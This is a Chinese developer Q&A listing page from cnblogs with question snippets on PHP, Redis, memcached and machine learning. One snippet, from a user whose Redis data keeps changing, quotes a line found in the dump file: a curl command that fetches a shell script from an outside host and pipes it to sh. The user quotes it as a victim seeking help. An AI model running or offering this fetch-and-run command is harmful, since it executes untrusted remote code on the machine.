首页 新闻 赞助 找找看
8
回答数

待解决问题 请问博客园用的是php还是.net?

内容详情请点击问题查看!
2
回答数

待解决问题 PHP出现 unexpected T_STRING 错误,这里的T_STRING什么意思?

PHP出现 unexpected T_STRING 错误,这里的T_STRING什么意思?
1
回答数

已关闭问题 5 一句php加密字符串的代码,请问能否用批处理实现

Signature=urlencode(base64_encode(hash_hmac('sha1', Content, SecretKey,true))) Content是多行字符串。
1
回答数

回答被采纳 请教一下博客园可以开个性域名吗?

比如说原本我的博客地址是:http://www.cnblogs.com/LittleHann如果有个性域名直接让我访问LittleHann.cnblogs.com就直接访问到我的网站呢?
2
回答数

回答被采纳 5 php中的is_null和null==判断有什么不同?

判断一个变量是否为空用运算符不就可以了么,为什么还要设计这个函数is_null,它们在性能上有区别吗?
3
回答数

已解决问题 有谁可以给我推荐一个php的继承开发环境?

有谁可以给我推荐一个php的继承开发环境?
3
回答数

待解决问题 20 网站被扫描到有漏洞,漏洞写的是安全事件-内容变更,请问这个是什么鬼?

网站被扫描到有漏洞,漏洞写的是安全事件-内容变更,请问这个是什么鬼?
1
回答数

回答被采纳 10 云服务器redis存储问题

我的云服务器redis存储的数据老是丢失改变.查看dump-rdb里面有一对这样的代码 curl -fsSL http://w.3ei.xyz:43768/lll.sh | sh Back2@G /2
1
回答数

回答被采纳 50 使用随机森林做五分类问题为什么产生了很严重的过拟合现象(训练集准确率99%,测试集准确率20%)

数据集特征维度为300,数据量约为9000*5, 数据集是随机打乱后以4:1的比例划分的,也尝试了随机选取特征、特征标准化等方法,仍然这样,甚至在使用三个特征时仍然会出现这样的问题,尝试了选取两类进行
3
回答数

待解决问题 50 memcached 服务器最少用几台比较合适

根据 memcached 的分布式算法,请问 memcached 服务器最少用几台比较合适?